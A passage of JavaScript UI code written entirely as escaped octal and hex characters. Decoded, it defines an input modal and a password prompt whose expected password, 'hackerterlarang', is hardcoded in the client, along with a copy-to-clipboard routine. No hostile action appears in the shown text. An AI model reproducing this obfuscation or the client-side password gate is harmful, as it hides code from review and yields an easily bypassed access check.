3\175\x29\40\x7b\12\x9\x9\x9\x72\145\x74\165\x72\x6e\40\x6e\145\x77\40\120\162\157\x6d\151\x73\145\50\x28\162\145\163\157\x6c\x76\145\x29\40\x3d\76\40\x7b\12\x9\x9\x9\x9\x63\x6f\x6e\163\x74\40\x6d\x6f\x64\x61\x6c\40\x3d\40\144\x6f\143\165\155\145\156\164\56\147\x65\164\x45\154\145\x6d\x65\156\x74\102\x79\111\144\50\47\x69\156\160\x75\x74\55\x6d\157\x64\141\x6c\47\x29\x3b\12\x9\x9\x9\x9\x63\x6f\x6e\x73\x74\x20\151\x6e\160\x75\164\106\x69\145\154\144\40\75\40\144\157\143\x75\x6d\145\x6e\164\56\147\x65\164\x45\x6c\145\x6d\x65\x6e\164\102\x79\111\144\50\47\151\x6e\160\165\x74\55\146\x69\x65\x6c\144\47\51\73\xa\x9\x9\11\11\x63\157\x6e\x73\164\x20\x6c\141\x62\145\x6c\105\154\40\x3d\40\144\157\x63\x75\155\x65\156\164\56\147\x65\164\105\154\145\155\145\156\164\102\x79\111\x64\50\x27\151\156\x70\x75\164\55\x6c\141\142\145\x6c\47\51\x3b\12\11\11\x9\11\x63\157\156\163\164\40\x74\151\x74\x6c\145\x45\154\40\x3d\x20\144\x6f\143\x75\x6d\145\156\x74\x2e\147\145\x74\x45\154\x65\155\x65\156\164\x42\171\111\144\x28\47\151\x6e\x70\x75\x74\x2d\x74\x69\x74\154\x65\47\51\x3b\xa\11\11\x9\11\143\157\156\163\164\40\151\x63\157\x6e\105\154\x20\75\40\144\x6f\143\x75\x6d\145\156\x74\56\x67\x65\164\105\154\145\155\145\156\x74\x42\x79\111\x64\50\47\151\156\x70\165\x74\55\151\143\x6f\156\x27\51\73\12\11\11\11\11\143\157\x6e\163\164\40\157\x6b\x42\x74\x6e\40\75\40\144\157\x63\165\x6d\145\156\x74\56\147\x65\x74\x45\x6c\x65\155\x65\x6e\164\102\x79\x49\144\50\x27\151\156\x70\x75\164\x2d\x6f\153\x2d\142\164\x6e\x27\51\x3b\xa\11\x9\11\11\143\157\x6e\163\164\40\143\141\156\x63\145\154\x42\164\x6e\40\75\40\144\x6f\143\165\x6d\145\x6e\164\56\147\145\x74\105\x6c\145\155\145\x6e\164\102\x79\x49\144\x28\x27\151\156\160\165\164\x2d\143\141\x6e\x63\x65\x6c\55\x62\164\156\47\x29\73\12\11\x9\11\x9\x63\x6f\156\163\164\x20\143\154\157\x73\145\102\164\156\40\75\x20\144\157\x63\165\155\145\x6e\x74\x2e\x67\145\x74\105\x6c\145\x6d\x65\x6e\x74\x42\171\111\x64\50\47\151\156\160\x75\x74\55\x6d\157\x64\x61\x6c\x2d\143\x6c\x6f\163\145\x27\x29\x3b\12\x9\x9\11\x9\143\x6f\156\163\x74\40\145\x72\x72\x6f\162\105\154\40\75\x20\x64\157\x63\165\x6d\x65\156\x74\x2e\147\x65\x74\x45\154\145\x6d\145\156\164\102\171\111\x64\50\47\151\x6e\160\x75\164\x2d\x65\x72\162\x6f\x72\47\51\73\xa\x9\x9\11\11\xa\11\x9\x9\x9\x69\146\40\50\x21\155\x6f\x64\x61\154\x20\x7c\x7c\40\41\151\156\160\165\164\x46\x69\x65\154\x64\51\x20\x72\x65\x74\165\162\156\40\162\x65\x73\x6f\x6c\x76\x65\x28\x6e\165\x6c\154\x29\73\12\11\x9\x9\x9\xa\x9\11\x9\x9\x2f\57\x20\x53\145\x74\x20\154\141\x62\145\x6c\40\141\x6e\x64\40\164\x69\x74\x6c\x65\12\11\x9\x9\11\154\141\x62\145\154\105\x6c\x2e\164\145\x78\164\x43\x6f\x6e\164\145\x6e\x74\x20\75\40\155\x65\163\x73\141\x67\145\x20\174\174\x20\x27\x45\x6e\x74\145\162\40\166\141\x6c\165\x65\72\47\x3b\12\11\11\x9\x9\164\151\164\x6c\145\105\154\x2e\164\145\x78\164\103\x6f\x6e\x74\145\156\164\40\75\x20\x6f\160\164\151\x6f\x6e\163\56\x74\151\x74\x6c\145\x20\174\174\40\47\xf0\x9f\223\x9d\40\x49\156\160\165\x74\40\122\x65\161\165\151\x72\x65\x64\47\73\12\11\11\x9\11\x69\x63\x6f\156\x45\x6c\56\x74\x65\170\x74\103\157\156\164\145\156\164\x20\x3d\40\157\160\164\151\157\156\x73\56\x69\143\157\156\40\x7c\x7c\x20\x27\xf0\237\223\x9d\47\73\xa\11\11\x9\11\12\11\x9\x9\11\57\x2f\x20\x53\145\x74\40\x64\145\146\x61\x75\x6c\164\x20\166\141\x6c\x75\145\xa\x9\x9\x9\11\151\156\160\165\x74\x46\x69\145\x6c\144\56\x76\x61\154\165\145\x20\75\x20\x64\145\146\x61\165\x6c\164\x56\x61\154\x75\x65\73\xa\11\x9\11\11\x69\x6e\x70\x75\x74\106\151\145\154\144\x2e\x74\171\160\x65\x20\x3d\x20\157\x70\164\x69\x6f\156\163\56\x74\171\x70\x65\x20\174\x7c\x20\x27\x74\145\170\x74\x27\73\xa\11\11\11\11\151\x6e\x70\x75\164\106\x69\x65\x6c\x64\56\x70\154\x61\x63\145\x68\x6f\154\144\145\x72\x20\75\40\x6f\x70\x74\151\x6f\156\x73\56\x70\x6c\x61\143\145\x68\x6f\x6c\x64\x65\162\40\174\x7c\40\47\x54\x79\160\x65\40\x68\145\x72\145\x2e\56\x2e\47\73\xa\x9\11\x9\x9\xa\x9\11\11\x9\57\57\x20\x43\x6c\145\x61\x72\x20\145\x72\162\x6f\x72\12\11\11\x9\11\145\162\x72\x6f\x72\x45\x6c\56\164\145\x78\164\x43\x6f\x6e\x74\145\x6e\x74\40\x3d\40\47\x27\73\12\11\x9\x9\11\145\x72\162\157\162\x45\154\x2e\143\154\141\163\x73\114\x69\x73\164\56\x72\145\155\x6f\x76\x65\x28\47\163\x68\x6f\167\x27\x29\73\xa\x9\x9\x9\x9\151\156\160\x75\164\x46\151\145\154\x64\56\163\164\x79\154\x65\x2e\142\157\x72\144\145\162\x43\157\x6c\x6f\x72\x20\x3d\40\47\166\x61\x72\50\x2d\55\x62\x6f\x72\144\145\x72\55\x63\157\154\157\162\x29\x27\x3b\12\x9\x9\x9\11\12\11\x9\11\11\57\x2f\x20\122\x65\x6d\157\x76\x65\x20\x6f\154\144\x20\x65\166\145\156\x74\x20\x6c\x69\x73\x74\145\x6e\145\x72\x73\40\x62\171\40\x63\x6c\x6f\156\151\x6e\147\x20\141\156\144\40\x72\x65\160\154\141\143\x69\156\147\12\x9\x9\11\11\143\x6f\156\x73\x74\x20\x6e\x65\x77\117\x6b\x42\164\156\x20\75\40\157\153\x42\x74\156\x2e\143\154\157\x6e\x65\x4e\157\x64\x65\x28\x74\x72\x75\145\x29\73\xa\11\x9\11\x9\x63\x6f\156\x73\164\x20\x6e\145\x77\x43\x61\x6e\143\145\x6c\102\x74\156\x20\x3d\x20\143\141\156\x63\x65\154\x42\x74\x6e\x2e\x63\x6c\x6f\x6e\x65\x4e\x6f\x64\x65\50\x74\162\x75\x65\x29\73\12\11\x9\11\11\x63\157\x6e\x73\x74\x20\156\145\167\103\x6c\x6f\x73\x65\102\164\156\x20\75\x20\143\x6c\x6f\x73\x65\x42\x74\x6e\x2e\x63\154\x6f\156\145\x4e\157\144\x65\50\x74\x72\165\x65\x29\73\12\x9\11\11\11\157\153\x42\164\x6e\56\160\x61\x72\x65\x6e\164\116\157\x64\145\x2e\x72\145\x70\154\141\x63\145\103\150\151\154\144\50\x6e\145\167\x4f\153\x42\x74\156\54\x20\157\153\x42\x74\156\x29\x3b\12\11\11\x9\x9\x63\x61\156\x63\x65\x6c\x42\164\x6e\56\160\141\x72\x65\156\x74\x4e\x6f\144\x65\x2e\x72\x65\x70\154\x61\x63\145\103\x68\x69\x6c\144\50\156\145\x77\103\x61\x6e\143\x65\154\x42\164\156\54\40\x63\141\156\x63\145\154\x42\x74\156\x29\x3b\xa\x9\11\11\x9\x63\x6c\x6f\163\145\x42\164\x6e\x2e\160\x61\162\x65\156\164\x4e\x6f\x64\x65\56\162\x65\x70\154\141\143\x65\x43\150\x69\154\144\x28\x6e\x65\167\103\154\157\x73\x65\x42\x74\156\54\x20\143\x6c\157\163\145\x42\x74\156\51\x3b\xa\x9\x9\x9\11\12\11\11\11\11\x2f\57\40\x53\164\x6f\x72\x65\40\x72\x65\146\145\162\145\156\143\145\x73\40\x66\x6f\162\40\143\154\145\x61\x6e\x75\160\xa\11\x9\x9\x9\143\157\x6e\163\164\x20\x68\141\x6e\x64\154\145\122\145\163\x6f\x6c\x76\x65\x20\75\x20\x28\166\x61\154\x75\x65\x29\40\x3d\76\x20\x7b\xa\x9\11\x9\x9\x9\164\150\x69\163\56\x63\154\157\x73\x65\x4d\x6f\x64\x61\x6c\50\155\x6f\x64\x61\154\x29\x3b\xa\11\11\x9\11\x9\x64\157\143\x75\155\145\156\x74\x2e\162\145\155\157\166\145\x45\x76\x65\156\164\x4c\x69\163\x74\145\x6e\x65\162\50\x27\153\145\x79\144\157\x77\x6e\x27\54\x20\145\x73\x63\110\x61\156\144\x6c\x65\162\x29\x3b\xa\x9\11\11\x9\x9\144\x6f\143\x75\155\x65\156\164\56\162\x65\155\x6f\166\x65\x45\166\145\156\164\x4c\x69\163\x74\x65\x6e\145\162\x28\47\x6b\x65\171\144\x6f\167\156\x27\x2c\x20\145\156\x74\145\x72\x48\141\156\144\154\145\x72\x29\x3b\12\x9\11\x9\11\x9\x72\145\163\157\154\166\x65\50\166\141\154\165\145\x29\x3b\12\11\11\x9\11\175\73\12\x9\11\x9\11\xa\x9\x9\11\x9\x2f\57\x20\x48\141\156\x64\154\145\40\105\123\103\40\x6b\145\x79\12\11\11\x9\x9\x63\x6f\x6e\163\x74\x20\145\163\x63\110\141\x6e\x64\x6c\145\162\x20\75\x20\50\x65\51\x20\75\76\x20\173\xa\x9\x9\x9\11\11\151\146\x20\50\145\56\153\145\171\x20\x3d\75\75\x20\47\105\163\143\x61\160\x65\47\51\x20\173\12\x9\x9\11\11\x9\x9\x68\141\x6e\x64\x6c\x65\x52\145\163\x6f\x6c\166\x65\50\156\165\154\x6c\x29\x3b\xa\11\x9\11\x9\11\175\12\11\11\11\x9\175\73\xa\11\x9\11\11\12\x9\11\11\x9\x2f\x2f\40\110\141\156\144\x6c\x65\40\x45\156\164\145\x72\40\153\x65\x79\12\x9\11\11\11\143\157\156\163\164\x20\x65\156\x74\x65\162\x48\141\x6e\144\154\145\x72\40\75\x20\x28\145\51\40\75\76\x20\173\xa\x9\11\11\11\x9\151\x66\x20\x28\x65\56\153\145\171\40\75\75\75\x20\47\x45\x6e\164\x65\162\x27\x20\x26\46\x20\x65\56\164\141\x72\147\x65\x74\x20\x3d\x3d\75\40\151\156\x70\x75\x74\106\x69\145\x6c\144\51\40\x7b\12\x9\x9\11\x9\11\11\145\x2e\x70\162\145\x76\145\x6e\164\x44\145\146\141\165\154\164\x28\x29\x3b\xa\11\11\11\x9\11\x9\x63\x6f\156\163\164\40\x76\x61\154\165\x65\x20\75\40\151\x6e\x70\x75\164\106\151\145\x6c\x64\x2e\166\x61\x6c\165\145\56\x74\x72\151\x6d\50\51\x3b\12\11\11\11\x9\x9\x9\151\146\40\50\157\x70\164\x69\x6f\x6e\x73\x2e\162\145\161\165\x69\x72\145\x64\x20\46\x26\40\41\x76\141\154\x75\x65\x29\40\173\xa\11\11\11\x9\11\x9\11\145\x72\162\x6f\x72\x45\154\56\164\145\x78\x74\103\157\x6e\x74\145\156\x74\x20\75\x20\x27\124\x68\151\163\x20\146\151\145\x6c\x64\40\x69\163\x20\x72\x65\x71\165\151\x72\145\144\x27\73\xa\11\x9\11\11\x9\x9\11\145\x72\162\x6f\x72\x45\x6c\56\143\154\141\163\x73\x4c\151\163\164\x2e\x61\144\x64\x28\x27\x73\150\157\x77\x27\51\x3b\12\11\11\x9\x9\11\11\x9\x69\156\160\x75\x74\x46\x69\x65\x6c\144\56\x73\x74\x79\154\145\x2e\x62\x6f\162\x64\x65\x72\103\x6f\x6c\x6f\162\40\x3d\x20\x27\x76\x61\162\50\55\55\141\x63\143\145\x6e\x74\55\162\145\x64\x29\47\x3b\12\11\11\11\x9\x9\x9\x9\151\156\160\165\x74\x46\151\145\x6c\144\x2e\x66\157\143\165\x73\50\x29\x3b\xa\11\x9\11\11\11\x9\x9\x72\145\x74\165\x72\x6e\73\12\x9\x9\11\11\x9\x9\x7d\12\11\x9\11\11\x9\x9\151\x66\40\50\157\160\x74\x69\157\156\x73\56\x76\141\x6c\x69\x64\x61\x74\x6f\x72\40\46\46\40\x21\157\x70\x74\151\x6f\156\163\56\166\141\x6c\151\144\x61\x74\157\x72\50\166\141\x6c\165\x65\x29\x29\x20\173\xa\11\11\11\11\x9\x9\11\145\x72\x72\157\x72\x45\154\x2e\x74\x65\170\164\103\157\x6e\x74\145\x6e\x74\40\x3d\x20\x6f\160\164\x69\157\x6e\163\56\x76\141\154\151\x64\141\164\157\x72\105\162\162\157\x72\40\174\x7c\40\x27\111\156\166\141\x6c\x69\144\40\x76\x61\154\165\145\47\x3b\12\x9\x9\x9\x9\x9\11\x9\x65\162\x72\157\162\x45\154\56\x63\154\x61\x73\163\x4c\151\x73\164\56\141\x64\144\50\47\x73\150\x6f\x77\x27\51\73\xa\11\11\x9\x9\x9\x9\11\151\156\x70\x75\164\x46\x69\145\x6c\x64\56\x73\164\x79\154\145\x2e\x62\x6f\x72\x64\x65\162\103\157\x6c\x6f\162\40\x3d\x20\47\x76\x61\162\50\x2d\x2d\141\143\143\145\156\164\x2d\162\x65\144\51\x27\x3b\xa\11\11\11\x9\11\11\x9\151\x6e\x70\165\164\106\x69\145\x6c\144\56\x66\157\143\165\163\50\51\73\12\x9\x9\11\11\11\11\11\162\x65\164\165\162\x6e\x3b\12\x9\x9\11\11\x9\x9\x7d\xa\11\x9\x9\x9\11\11\x68\x61\x6e\144\x6c\145\122\145\163\157\x6c\x76\x65\x28\x76\x61\154\x75\145\x20\x7c\x7c\x20\156\x75\x6c\154\x29\73\xa\11\11\x9\x9\x9\175\xa\11\x9\x9\x9\175\73\12\x9\11\x9\11\xa\x9\x9\x9\11\x2f\x2f\40\101\x64\144\40\x6e\x65\167\x20\x65\166\145\x6e\x74\x20\x6c\151\x73\164\145\x6e\x65\x72\x73\xa\x9\11\11\x9\x6e\x65\x77\117\x6b\x42\164\x6e\x2e\x6f\x6e\143\x6c\x69\x63\153\x20\75\40\50\x29\x20\75\76\40\173\12\x9\x9\x9\11\x9\143\x6f\156\163\x74\40\x76\141\154\x75\145\x20\75\40\x69\156\160\x75\164\x46\151\145\x6c\144\56\x76\x61\154\x75\145\x2e\164\162\151\155\50\x29\x3b\12\11\11\x9\11\x9\x69\x66\40\x28\157\x70\164\151\x6f\x6e\163\56\x72\145\x71\x75\x69\x72\x65\x64\x20\46\46\40\x21\x76\141\x6c\x75\145\x29\x20\173\xa\x9\x9\x9\x9\11\x9\x65\162\162\157\x72\x45\154\56\164\145\170\164\103\x6f\x6e\x74\x65\156\164\40\x3d\x20\47\x54\x68\151\163\40\x66\151\145\x6c\144\40\x69\163\x20\x72\x65\x71\x75\x69\162\x65\144\47\x3b\12\11\11\x9\x9\x9\11\x65\162\x72\157\162\x45\x6c\56\143\x6c\141\x73\163\114\x69\x73\x74\56\x61\144\x64\50\47\163\x68\157\x77\47\x29\73\xa\x9\11\11\x9\11\x9\151\156\160\165\164\x46\151\145\x6c\x64\x2e\x73\x74\x79\x6c\145\56\142\x6f\x72\144\145\162\x43\157\x6c\x6f\x72\x20\x3d\40\47\166\x61\x72\x28\x2d\55\141\x63\x63\x65\x6e\x74\55\162\x65\144\51\x27\73\12\x9\11\11\11\x9\11\151\x6e\160\165\x74\x46\x69\x65\x6c\x64\x2e\x66\x6f\143\x75\163\50\51\x3b\xa\11\11\11\x9\11\x9\x72\145\164\165\x72\156\x3b\12\x9\x9\11\11\11\175\xa\x9\x9\11\11\x9\x69\x66\40\50\157\160\x74\151\157\156\x73\56\x76\x61\154\x69\144\x61\164\x6f\162\x20\x26\x26\x20\x21\x6f\x70\164\x69\x6f\156\x73\x2e\x76\x61\x6c\151\x64\x61\x74\x6f\x72\x28\x76\141\x6c\x75\145\51\51\40\x7b\12\x9\11\11\x9\x9\x9\x65\162\x72\x6f\162\x45\x6c\56\x74\x65\x78\x74\103\x6f\156\164\x65\156\x74\x20\75\x20\157\160\164\x69\157\156\x73\56\166\141\x6c\151\x64\141\x74\x6f\162\105\x72\162\157\162\x20\174\x7c\40\x27\111\x6e\166\141\x6c\151\144\x20\x76\x61\x6c\165\x65\x27\x3b\12\11\11\x9\x9\11\x9\145\x72\x72\157\x72\105\154\56\x63\x6c\x61\x73\x73\x4c\x69\163\164\56\x61\x64\x64\x28\x27\163\x68\x6f\167\47\x29\x3b\xa\x9\x9\11\x9\x9\x9\151\x6e\160\x75\164\106\151\x65\154\x64\x2e\x73\164\171\154\x65\56\x62\157\x72\144\145\162\103\x6f\154\x6f\162\x20\x3d\40\x27\x76\x61\162\50\x2d\x2d\x61\143\143\x65\x6e\x74\55\x72\145\144\51\x27\73\12\x9\11\11\11\11\x9\151\x6e\x70\165\164\106\x69\145\x6c\144\x2e\x66\x6f\x63\165\163\x28\x29\x3b\xa\11\x9\11\11\x9\11\162\145\164\x75\162\156\73\xa\x9\11\x9\x9\x9\x7d\12\11\11\x9\x9\11\x68\141\156\144\x6c\x65\x52\145\x73\157\x6c\166\145\50\x76\141\x6c\x75\145\x20\174\174\x20\156\x75\x6c\x6c\51\73\12\x9\11\11\11\175\73\xa\x9\x9\x9\11\x6e\x65\x77\103\x61\x6e\143\145\154\x42\164\x6e\56\x6f\x6e\x63\154\x69\143\x6b\40\75\40\x28\x29\40\75\76\x20\150\x61\x6e\x64\x6c\x65\x52\x65\x73\157\x6c\166\145\x28\156\165\154\154\x29\x3b\xa\11\11\11\11\156\x65\x77\x43\x6c\157\163\145\x42\164\156\56\157\x6e\143\154\x69\143\153\40\x3d\40\50\51\40\75\76\40\x68\x61\156\x64\x6c\145\122\145\163\157\154\166\145\50\x6e\x75\x6c\x6c\x29\x3b\12\x9\11\11\x9\xa\11\x9\11\x9\x2f\57\40\x43\154\157\163\145\40\x6f\156\40\x62\x61\143\x6b\x64\x72\157\160\40\x63\154\151\x63\x6b\12\x9\x9\11\11\143\x6f\156\x73\164\x20\x62\141\x63\x6b\144\162\157\x70\110\141\156\144\154\145\162\x20\x3d\x20\50\145\51\x20\75\76\x20\173\12\11\11\11\x9\11\151\x66\40\50\145\x2e\x74\x61\162\x67\145\x74\40\x3d\75\75\x20\155\x6f\x64\x61\154\51\40\173\12\11\x9\x9\x9\11\x9\150\141\x6e\144\x6c\x65\122\145\163\x6f\154\166\x65\x28\x6e\165\x6c\x6c\x29\73\12\x9\11\11\11\11\175\xa\x9\x9\x9\x9\x7d\x3b\xa\11\11\11\x9\x6d\157\x64\x61\x6c\56\157\x6e\143\154\151\143\153\x20\75\x20\142\141\x63\153\x64\162\157\160\110\141\156\x64\x6c\x65\x72\73\xa\x9\11\x9\11\12\11\11\x9\11\x2f\57\x20\101\144\144\x20\x6b\145\171\x20\x6c\x69\x73\164\145\x6e\145\x72\x73\xa\11\x9\11\x9\144\x6f\x63\x75\155\145\x6e\x74\x2e\141\x64\144\x45\166\145\x6e\164\114\151\x73\x74\x65\x6e\x65\162\50\47\x6b\145\x79\x64\157\167\x6e\47\54\40\x65\x73\143\x48\x61\156\x64\154\x65\x72\51\x3b\12\x9\11\x9\11\144\x6f\143\x75\155\x65\x6e\164\x2e\x61\x64\x64\105\166\x65\x6e\164\114\x69\x73\x74\145\156\x65\x72\50\x27\153\145\171\x64\x6f\167\156\47\x2c\40\145\x6e\x74\x65\162\x48\141\156\144\154\145\162\51\x3b\12\11\11\11\11\xa\11\x9\11\x9\x2f\x2f\x20\123\x68\x6f\x77\40\155\x6f\x64\x61\x6c\xa\x9\11\x9\11\164\x68\151\x73\x2e\x73\150\157\x77\x4d\x6f\144\141\154\x28\155\157\144\141\154\x29\x3b\xa\x9\11\11\11\xa\x9\11\11\11\x2f\57\40\106\x6f\143\165\163\x20\x6f\156\40\x69\156\x70\165\164\40\x66\151\145\154\144\x20\141\x6e\x64\x20\163\145\154\x65\x63\164\x20\164\x65\170\x74\x20\x69\x66\40\x64\145\x66\141\165\154\x74\x20\166\141\154\165\145\12\x9\11\11\11\163\145\x74\124\x69\155\145\157\165\x74\x28\x28\51\40\x3d\76\x20\x7b\xa\x9\11\11\x9\x9\x69\x6e\160\165\x74\106\151\x65\154\x64\x2e\x66\157\x63\165\163\50\x29\x3b\xa\11\11\x9\11\x9\151\146\40\50\x64\x65\146\x61\x75\x6c\x74\126\141\154\x75\x65\x29\40\173\12\x9\x9\11\11\x9\x9\x69\156\x70\165\x74\x46\x69\x65\154\144\56\x73\145\x6c\145\143\x74\50\x29\x3b\xa\x9\x9\11\11\11\175\12\x9\11\x9\11\x7d\54\x20\x31\60\x30\51\x3b\xa\11\11\x9\x7d\x29\x3b\xa\x9\x9\x7d\54\xa\11\x9\x73\x68\x6f\x77\x50\x61\163\163\x77\x6f\x72\144\115\157\144\x61\154\50\x63\141\x6c\x6c\142\141\143\x6b\x29\x20\173\xa\11\x9\11\143\x6f\x6e\163\x74\40\x6d\157\x64\141\x6c\40\x3d\40\x64\x6f\143\x75\x6d\x65\x6e\x74\56\x67\x65\164\105\154\145\155\x65\156\164\102\x79\111\x64\50\47\x70\x61\x73\x73\x77\157\x72\144\55\155\x6f\x64\x61\154\47\x29\73\xa\11\11\x9\x63\157\156\x73\x74\x20\x70\x61\x73\163\167\x6f\162\x64\x49\156\160\x75\164\40\x3d\x20\144\x6f\143\165\155\145\x6e\164\x2e\147\x65\x74\105\x6c\x65\x6d\145\156\x74\x42\171\x49\144\x28\x27\x70\x61\x73\163\167\157\162\x64\55\151\156\x70\x75\164\47\x29\x3b\12\x9\11\x9\x63\x6f\x6e\163\x74\x20\160\x61\x73\163\x77\157\x72\x64\105\162\x72\x6f\x72\40\x3d\x20\144\x6f\x63\165\x6d\x65\x6e\164\x2e\x67\x65\x74\105\x6c\145\x6d\x65\x6e\164\x42\x79\111\144\50\x27\x70\x61\163\163\167\x6f\x72\x64\55\145\x72\162\x6f\x72\47\x29\73\12\11\11\11\x63\x6f\156\163\x74\x20\x73\x75\x62\155\x69\164\x42\x74\156\40\x3d\40\x64\x6f\143\165\155\x65\156\x74\56\x67\145\x74\105\x6c\145\155\x65\x6e\x74\102\171\x49\144\x28\47\x70\x61\x73\x73\167\157\x72\144\x2d\163\165\x62\x6d\x69\x74\x2d\142\x74\156\47\x29\73\12\x9\x9\11\x63\x6f\156\x73\x74\x20\143\x61\x6e\x63\145\x6c\x42\164\156\x20\75\x20\x64\x6f\x63\x75\x6d\145\x6e\x74\56\x67\145\164\105\154\145\x6d\145\x6e\164\x42\171\111\144\50\x27\x70\x61\x73\x73\167\157\x72\144\x2d\143\141\156\x63\x65\154\x2d\x62\x74\x6e\x27\51\x3b\xa\x9\x9\11\143\x6f\x6e\163\164\x20\x63\154\x6f\x73\x65\x42\x74\x6e\40\x3d\40\x64\x6f\143\x75\x6d\x65\x6e\164\56\x67\x65\x74\x45\154\145\x6d\145\x6e\x74\102\x79\111\144\50\x27\x70\x61\x73\x73\x77\x6f\162\144\55\155\x6f\144\x61\x6c\x2d\143\154\x6f\163\x65\x27\51\73\xa\x9\11\x9\143\157\156\x73\164\40\143\157\160\x79\102\x74\x6e\x20\x3d\x20\x64\x6f\x63\165\x6d\145\156\164\x2e\x67\145\x74\105\x6c\x65\155\x65\x6e\164\102\x79\111\144\50\x27\x63\157\x70\x79\x2d\160\x61\163\163\167\x6f\162\x64\x2d\x62\164\156\47\51\x3b\xa\x9\11\11\x63\157\156\x73\x74\40\143\x6f\162\x72\145\x63\164\x50\141\163\x73\x77\x6f\x72\144\40\75\x20\x27\x68\141\143\153\145\x72\164\145\x72\x6c\141\x72\141\x6e\x67\47\x3b\12\11\x9\11\xa\11\x9\11\57\x2f\x20\122\145\163\x65\x74\40\x6d\x6f\x64\x61\154\x20\x73\164\141\x74\145\12\x9\11\x9\x70\141\x73\163\x77\x6f\162\144\x49\156\160\165\x74\56\166\141\154\x75\x65\x20\x3d\x20\47\47\73\xa\x9\x9\x9\160\141\163\x73\167\157\x72\x64\105\x72\162\157\x72\56\164\x65\x78\164\x43\157\156\164\x65\156\164\x20\x3d\40\x27\x27\x3b\xa\11\11\x9\x70\141\x73\163\167\157\162\144\x45\x72\162\157\162\56\x63\x6c\x61\163\163\x4c\x69\163\x74\x2e\x72\145\x6d\x6f\166\x65\x28\x27\x73\x68\157\167\47\x29\x3b\12\x9\x9\11\x70\x61\163\163\167\157\x72\x64\111\156\160\x75\164\56\163\164\x79\154\x65\x2e\x62\x6f\162\x64\145\162\103\157\154\157\x72\x20\x3d\x20\47\166\x61\x72\x28\x2d\55\142\x6f\162\x64\x65\162\x2d\x63\x6f\x6c\x6f\x72\x29\47\73\12\x9\11\x9\12\11\x9\11\57\x2f\x20\x53\x68\x6f\x77\40\x6d\157\x64\141\x6c\12\11\11\x9\164\x68\151\163\x2e\163\150\157\x77\x4d\x6f\144\x61\154\50\155\x6f\x64\x61\x6c\x29\x3b\12\x9\11\x9\160\x61\x73\x73\x77\157\162\144\x49\156\160\165\164\56\x66\x6f\143\x75\163\50\x29\73\12\11\11\x9\xa\11\11\x9\57\x2f\x20\x43\157\160\171\x20\160\141\x73\163\x77\157\x72\x64\x20\x66\x75\x6e\143\164\151\x6f\x6e\12\11\x9\11\143\157\156\163\x74\40\143\157\x70\x79\x50\141\163\x73\167\157\x72\144\x20\x3d\x20\50\51\x20\x3d\76\40\173\12\x9\11\11\11\156\141\x76\x69\147\141\x74\x6f\162\56\143\x6c\x69\160\142\x6f\x61\x72\x64\56\167\x72\x69\164\145\x54\x65\x78\x74\x28\x63\157\x72\162\x65\x63\x74\x50\x61\163\x73\167\x6f\x72\x64\51\56\164\x68\x65\156\50\50\51\40\x3d\76\40\x7b\xa\11\x9\x9\11\11\x63\x6f\160\171\102\164\x6e\56\164\145\170\164\103\157\156\164\x65\x6e\164\40\75\x20\47\xe2\234\205\x20\103\157\160\151\145\x64\41\x27\x3b\xa\x9\x9\11\11\11\163\x65\x74\124\x69\155\x65\x6f\165\x74\x28\x28\51\x20\75\76\x20\173\12\x9\11\11\x9\x9\11\143\x6f\160\x79\x42\164\156\x2e\x74\x65\170\164\x43\x6f\156\x74\x65\156\164\x20\x3d\40\47\360\x9f\223\x8b\47\73\xa\11\11\x9\x9\11\175\x2c\40\62\x30\60\60\x29\x3b\xa\11\x9\11\11\x7d\x29\56\x63\x61\x74\x63\150\x28\x28\x29\x20\x3d\76\40\x7b\12\11\11\11\11\x9\x2f\x2f\x20\106\141\154\x6c\142\x61\x63\153\x20\x66\x6f\162\40\x6f\x6c\x64\145\x72\x20\x62\162\157\167\163\x65\x72\x73\xa\x9\x9\11\11\11\x63\157\156\x73\x74\x20\164\145\170\164\101\162\x65\x61\40\75\40\144\157\x63\x75\x6d\145\x6e\x74\x2e\143\162\x65\x61\x74\145\x45\x6c\x65\155\x65\x6e\x74\50\x27\x74\145\x78\164\x61\162\x65\x61\x27\51\73\12\x9\x9\x9\x9\11\x74\145\x78\164\101\162\x65\x61\56\166\x61\154\x75\x65\x20\x3d\40\143\x6f\162\x72\145\x63\x74\x50\x61\x73\x73\167\157\162\144\73\xa\x9\x9\11\11\11\144\157\143\165\x6d\x65\156\x74\56\142\x6f\144\171\x2e\141\x70\160\145\x6e\x64\103\x68\151\x6c\144\50\164\x65\170\164\x41\162\x65\x61\x29\x3b\xa\11\x9\11\x9\x9\164\145\170\164\101\x72\x65\x61\x2e\x73\145\x6c\145\x63\164\x28\51\x3b\12\11\11\11\11\11\x64\x6f\x63\x75\155\145\x6e\164\56\x65\170\x65\x63\x43\157\155\155\x61\156\144\x28\x27\143\157\160\171\47\x29\73\12\11\x9\x9\11\11\144\157\143\x75\x6d\x65\156\164\56\142\157\144\171\56\162\145\x6d\x6f\166\x65\x43\150\x69\x6c\144\x28\x74\145\x78\x74\101\x72\x65\x61\x29\x3b\12\x9\11\11\11\x9\143\x6f\160\171\x42\x74\156\x2e\164\145\x78\x74\103\x6f\x6e\x74\145\156\164\x20\75\x20\47\342\234\x85\x20\103\x6f\x70\x69\x65\144\x21\x27\73\xa\11\11\x9\x9\x9\x73\x65\x74\124\151\x6d\x65\x6f\165\164\x28\50\51\40\75\76\x20\173\12\x9\x9\11\11\x9\x9\143\x6f\x70\x79\102\x74\156\56\164\x65\x78\x74\x43\157\x6e\x74\x65\x6e\164\40\75\40\x27\xf0\x9f\223\213\x27\73\xa\x9\11\11\x9\x9\x7d\54\x20\x32\60\x30\x30\51\x3b\12\x9\11\x9\x9\175\x29\73\12\11\11\x9\x7d\x3b\xa\11\x9\x9\xa\x9\x9\x9\x2f\57\40\x56\x61\154\x69\x64\141\x74\145\x20\x61\156\144\40\x73\x75\142\155\151\x74\12\x9\11\11\x63\x6f\x6e\x73\x74\x20\x76\141\154\x69\144\x61\x74\x65\x41\x6e\x64\123\x75\x62\x6d\x69\x74\x20\75\x20\x28\x29\40\75\76\x20\x7b\12\11\11\x9\x9\143\x6f\x6e\163\164\40\145\x6e\x74\145\162\145\144\120\141\163\163\167\157\162\144\x20\75\x20\x70\141\163\x73\167\157\x72\x64\111\156\160\165\x74\x2e\166\x61\x6c\x75\x65\56\164\x72\x69\155\x28\51\73\xa\x9\11\x9\11\xa\11\x9\x9\11\x69\x66\x20\x28\x21\145\156\164\145\x72\x65\144\x50\x61\x73\x73\x77\x6f\x72\x64\x29\x20\x7b\xa\11\11\x9\11\11\x70\141\x73\163\167\x6f\x72\x64\x45\162\162\157\x72\56\x74\145\